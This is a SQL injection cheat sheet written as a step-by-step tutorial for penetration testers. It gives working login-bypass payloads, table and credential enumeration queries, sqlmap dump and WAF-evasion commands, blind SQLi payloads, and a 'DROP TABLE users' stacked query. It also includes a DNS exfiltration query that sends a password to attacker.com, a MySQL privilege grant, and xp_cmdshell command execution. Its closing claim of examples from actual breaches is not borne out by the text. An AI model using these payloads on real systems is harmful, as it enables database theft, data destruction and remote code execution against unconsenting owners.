Introduction

SQL Injection (SQLi) remains one of the most dangerous vulnerabilities in web applications, allowing attackers to manipulate databases, extract sensitive data, and even gain remote access. This cheat sheet focuses on real-world SQLi exploitation with hands-on examples, bypassing security filters, and using tools like Burp Suite and SQLMap.

Ensure you have:

• Burp Suite (for manual exploitation)
• SQLMap (for automated attacks)
• A vulnerable web application to practice

Step 1: Identifying SQL Injection Vulnerability

Manual Testing with Basic Payloads

In a login form, test with:

admin' OR '1'='1' --

If you get access without a correct password, it’s vulnerable.

Check for errors using:

' OR 1=1 --
" OR 1=1 --
' OR 'a'='a' --

If an error occurs (e.g., syntax error or unclosed quotation), the input field is vulnerable.

Using Burp Suite to Intercept Requests

1. Enable Burp Suite Proxy and intercept a login request.
2. Modify the username field to admin'--.
3. If authentication succeeds, SQLi is present.

Step 2: Extracting Database Information

Once confirmed vulnerable, extract database info using:

Determining Database Type

SELECT @@version;   -- MySQL
SELECT version();   -- PostgreSQL
SELECT banner FROM v$version; -- Oracle

Enumerating Tables and Columns

SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';

Extracting User Credentials

SELECT username, password FROM users;

Step 3: Automated Exploitation with SQLMap

SQLMap can automate SQL injection with simple commands.

Basic SQL Injection Scan

sqlmap -u "http://target.com/login.php?id=1" --dbs

Dumping User Credentials

sqlmap -u "http://target.com/login.php?id=1" -D database_name -T users --dump

Bypassing WAFs with Randomized Case Encoding

sqlmap -u "http://target.com/login.php?id=1" --tamper=between,randomcase

Step 4: Blind SQL Injection Exploitation

If no errors or output is displayed, blind SQLi can be used.

Time-Based Blind SQLi

' OR IF(1=1, SLEEP(5), 0) --

If the response is delayed, SQLi is confirmed.

Boolean-Based Blind SQLi

' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) --

If successful, the server responds differently based on the condition.

Step 5: Exploiting Advanced SQL Injection Techniques

Stacked Queries (Executing Multiple Statements)

admin'; DROP TABLE users; --

(Only works if multiple queries are allowed.)

Extracting Data via DNS Exfiltration

SELECT load_file(concat('\\', (SELECT password FROM users LIMIT 1), '.attacker.com\file'));

(Useful when output is blocked.)

Privilege Escalation & OS Command Execution

MySQL User Escalation

SELECT user, host FROM mysql.user;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'hacked';

Executing System Commands in MSSQL

EXEC xp_cmdshell 'whoami';

(Useful for Remote Code Execution.)

Step 6: Bypassing Security Filters & WAFs

Most web applications use WAFs (Web Application Firewalls) to detect SQLi. Here’s how to bypass them:

Encoding Payloads (Hex, Base64, URL Encoding)

SELECT username FROM users WHERE id=0x61646D696E; -- HEX encoding

SELECT username FROM users WHERE id=BASE64_DECODE('YWRtaW4=');

Using Comment Injection to Obfuscate Payloads

SELECT/**/username/**/FROM/**/users/**/WHERE/**/id/**/=1;

Randomized Case & White Space Manipulation

SeLeCt UsErNaMe FrOm UsErS WhErE iD=1;

Conclusion

SQL Injection remains a high-impact vulnerability, but with proper understanding and hands-on practice, penetration testers can identify and exploit it effectively. This cheat sheet provided:

• Step-by-step exploitation techniques
• Real-world SQLi payloads
• WAF bypassing strategies
• Examples from actual security breaches